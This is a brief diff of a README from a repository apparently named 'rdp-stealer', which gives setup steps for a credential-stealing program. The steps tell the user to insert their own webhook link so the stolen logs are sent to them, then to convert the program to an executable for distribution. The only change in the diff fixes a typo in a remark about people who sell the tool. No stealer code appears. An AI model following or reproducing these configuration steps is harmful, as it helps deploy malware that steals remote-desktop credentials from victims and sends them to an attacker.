galviy/rdp-stealer/README.md

 3. Open line 2 and change ```const logs = new Webhook("your webhook links");``` to your webhook link
 4. after finishing all this, you can convert this program to exe

-# anyone selling this program is idioy human.
+# anyone selling this program is idiocy human.